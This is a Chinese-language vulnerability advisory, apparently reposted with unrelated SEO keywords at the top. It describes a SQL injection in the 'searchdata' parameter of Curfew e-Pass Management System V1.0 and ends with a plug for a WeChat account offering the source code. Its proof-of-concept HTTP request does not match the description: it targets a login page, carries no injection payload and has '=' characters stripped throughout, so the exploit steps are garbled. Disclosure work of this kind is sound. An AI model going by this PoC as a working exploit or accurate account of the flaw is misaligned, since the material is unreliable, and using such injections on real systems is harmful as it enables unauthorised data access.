国外英文网站,长春建站怎么做,网站显示500错误怎么解决方法,汕头免费自助建站模板免责声明#xff1a;本文所涉及的信息安全技术知识仅供参考和学习之用#xff0c;并不构成任何明示或暗示的保证。读者在使用本文提供的信息时#xff0c;应自行判断其适用性#xff0c;并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决… 免责声明本文所涉及的信息安全技术知识仅供参考和学习之用并不构成任何明示或暗示的保证。读者在使用本文提供的信息时应自行判断其适用性并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规并保证不违反任何相关法律法规。 1. Curfew e-Pass 管理系统简介 用该系统通过电子通行证的方式帮助政府和相关机构实现对宵禁期间人员出行的管控和管理。用户可以通过该系统在线申请电子通行证提供相关个人信息和出行计划系统审核后颁发电子通行证。 2. 漏洞描述 在index.php页面上searchdata参数在搜索函数中的使用存在严重的SQL注入漏洞攻击者可以利用这个漏洞来执行恶意的SQL查询从而获取未授权的数据或者破坏系统的完整性。 3. 影响版本
Curfew e-Pass 管理系统 V1.0 4. POCEXP
注入点searchdata
POST /employee/Admin/login.php HTTP/1.1
Host: xxx
Content-Length: 52
Cache-Control: max-age0
Upgrade-Insecure-Requests: 1
Origin: xxx
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7
Referer: xxx/employee/Admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q0.9,en;q0.8
Cookie: PHPSESSID6aautr8786cmf5hon5h
Connection: close
txtusernameadmintxtpassword1btnlogin 5. 漏洞代码定位 第61行的代码存在安全风险因为用户输入的 $searchdata变量直接插入到 SQL 查询语句中而没有进行任何限制。这种做法使恶意用户能够利用恶意 SQL 语句执行任意数据库操作从而对系统造成严重的安全威胁。 6. 源代码获取 关注公众号“漏洞猎人”输入“curfew”即可获取Curfew e-Pass管理系统源代码下载地址
